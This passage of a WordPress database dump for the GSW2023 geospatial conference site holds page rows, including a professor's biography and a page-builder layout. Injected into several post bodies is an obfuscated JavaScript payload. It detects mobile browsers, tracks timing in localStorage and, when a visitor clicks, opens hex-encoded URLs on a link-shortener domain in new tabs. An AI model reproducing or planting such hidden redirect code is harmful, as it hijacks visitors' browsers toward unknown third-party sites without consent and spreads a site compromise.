Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-02 20:02:54','2023-06-02 20:02:54','',3066,'https://gsw2023.com/?p=4610',0,'revision','',0),
(4611,1,'2020-06-03 09:21:19','2020-06-03 09:21:19','<!-- wp:paragraph -->\n<p><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Vice President for Postgraduates Studies and Scientific Research</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Contact Information:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Office Phone: (002)03-5497598</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mobile: (002)0107382198</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Email: aaelbary@aast.edu</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Address: Miami, P. O. Box 1029, Alexandria, Egypt.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Biography</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Prof. Dr. Alaa A. Abdelbary</strong> is a distinguished academic and researcher published more than 300 research papers in reputable journals and conferences.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>currently serving as the Vice President for Postgraduates Studies and Scientific Research at the Arab Academy for Science, Technology &amp; Maritime Transport (AASTMT) in Alexandria, Egypt. With a strong focus on applying innovative mathematical and computational approaches to solve complex physical problems, Prof. Abdel Bary has made significant contributions to the field.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>His expertise extends to the use of machine learning techniques for decision support systems, where he has demonstrated a keen ability to integrate cutting-edge technologies into practical applications. As the Vice President at AASTMT, he leads a dedicated team in the sector of higher studies and scientific research, overseeing numerous national and international projects in the field of science and technology.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Prof. Abdelbary\'s</strong> influence in the academic community extends beyond his institutional role. He is an active member of the Naqaa Nanotechnology Network and the International Leadership Association, highlighting his commitment to fostering collaboration and advancing knowledge in his field. Additionally, he serves on the editorial boards of prestigious journals such as the Journal of Applied Science Research, Australian Journal of Basic and Applied Sciences, and International Journal of Renewable Energy Technology Research.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With a passion for sharing knowledge, Prof. Abdel Bary has authored several books in mathematics and statistics, including notable titles such as \"Pure Mathematics with Applications\" (Alexandria, 2002), \"Financial Mathematics\" (Alexandria, 2003), and \"Probability and Statistics\" (Alexandria, 2006). His publications have contributed to the academic community and have become valuable resources for students and researchers alike.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Prof. Abdelbary’s</strong> dedication to academia and his profound research contributions have earned him recognition as Editor- in – chief, Editorial board and reviewer for many esteemed journals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Prof Abdelbary</strong> organizes many and many conferences in the field of Mathematics, Computer science, Remote sensing, Environment and Future studies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He is the legal representative for Arab Academy in EU, USAID, WFP, UfM, Unimed and EMUNI.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In February 2022 he got his DSc in Mathematics from Alexandria university, as the first mathematician to obtain such a degree from Alexandria university.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Prof. Abdelbary </strong>is the Rapporteur of the National&nbsp;&nbsp; Committee for Mathematics and the chairman of the council of Future studies and risk management in Egypt.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Last but not least Abdelbary selected in the EMUNI Senate for a 4- years starting from May 2023.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Alaa A. Abdelbary','','publish','closed','closed','','prof-dr-alaa-a-abdelbary','','','2023-06-03 09:33:48','2023-06-03 09:33:48','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4611',0,'dt_team','',0),
(4613,1,'2023-06-03 09:26:01','2023-06-03 09:26:01','','dr-alaa','','inherit','open','closed','','dr-alaa-2','','','2023-06-03 09:26:01','2023-06-03 09:26:01','',4611,'https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg',0,'attachment','image/jpeg',0),
(4614,1,'2023-06-03 09:52:21','2023-06-03 09:52:21','','dr-alaa','','inherit','open','closed','','dr-alaa-3','','','2023-06-03 09:52:21','2023-06-03 09:52:21','',3233,'https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa-1.jpg',0,'attachment','image/jpeg',0),
(4615,1,'2023-06-03 10:22:09','2023-06-03 10:22:09','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 